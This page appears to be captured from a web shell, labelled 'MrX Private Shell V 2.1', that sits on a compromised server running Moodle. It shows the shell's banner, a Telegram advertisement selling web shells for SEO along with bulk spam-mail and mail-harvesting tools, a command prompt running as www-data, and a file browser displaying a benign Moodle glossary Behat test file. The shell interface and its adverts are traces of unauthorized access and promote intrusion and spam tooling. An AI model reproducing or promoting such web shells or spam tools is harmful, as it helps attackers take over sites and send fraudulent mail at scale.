__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_glossary
Feature: Create a glossary entry.
  In order to create glossary entries
  As a user
  I should be able to enter an entry without using reserved keywords

  Background:
    Given the following "users" exist:
      | username | firstname | lastname | email                |
      | teacher1 | Teacher   | 1        | teacher1@example.com |
      | student1 | Student   | 1        | student1@example.com |
    And the following "courses" exist:
      | fullname | shortname | format |
      | Course 1 | C1        | topics |
    And the following "course enrolments" exist:
      | user     | course | role           |
      | teacher1 | C1     | editingteacher |
      | student1 | C1     | student        |
    And the following "activity" exists:
      | activity | glossary |
      | course | C1 |
      | name | Test glossary |

  Scenario: Glossary entry edition of custom tags works as expected
    Given I am on the "Test glossary" "glossary activity" page logged in as "teacher1"
    When I press "Add entry"
    And I set the following fields to these values:
      | Concept    | Dummy first entry               |
      | Definition | Dream is the start of a journey |
      | Keyword(s) | "                               |
    And I press "Save changes"
    Then I should see "One or more keywords contain a special character which cannot be used."

  @javascript @_file_upload
  Scenario: Create glossary entry with attached file
    Given I am on the "Test glossary" "glossary activity" page logged in as student1
    # As a student, add a glossary entry with attachment
    And I press "Add entry"
    And I set the following fields to these values:
      | Concept    | Entry 1                                   |
      | Definition | Definition of Entry 1                     |
      | Attachment | mod/glossary/tests/fixtures/musicians.xml |
    And I press "Save changes"
    # Confirm you can download attachment from student's entry as teacher
    When I am on the "Test glossary" "glossary activity" page logged in as teacher1
    Then I should see "Entry 1"
    And following "musicians.xml" should download a file that:
      | Has mimetype                 | text/xml       |
      | Contains text in xml element | Paul McCartney |

Filemanager

Name Type Size Permission Actions
behat_mod_glossary.php File 2.96 KB 0777
categories.feature File 6 KB 0777
create_entry.feature File 2.22 KB 0777
edit_tags.feature File 5.69 KB 0777
entries_always_editable.feature File 1.62 KB 0777
entries_require_approval.feature File 3.63 KB 0777
glossary_activity_completion.feature File 4.61 KB 0777
glossary_activity_completion_pass_grade.feature File 6.3 KB 0777
glossary_display_formats.feature File 4.42 KB 0777
import_entries.feature File 2.1 KB 0777
prevent_duplicate_entries.feature File 1.5 KB 0777
print_friendly_version.feature File 2.11 KB 0777
search_entries.feature File 3.32 KB 0777
Filemanager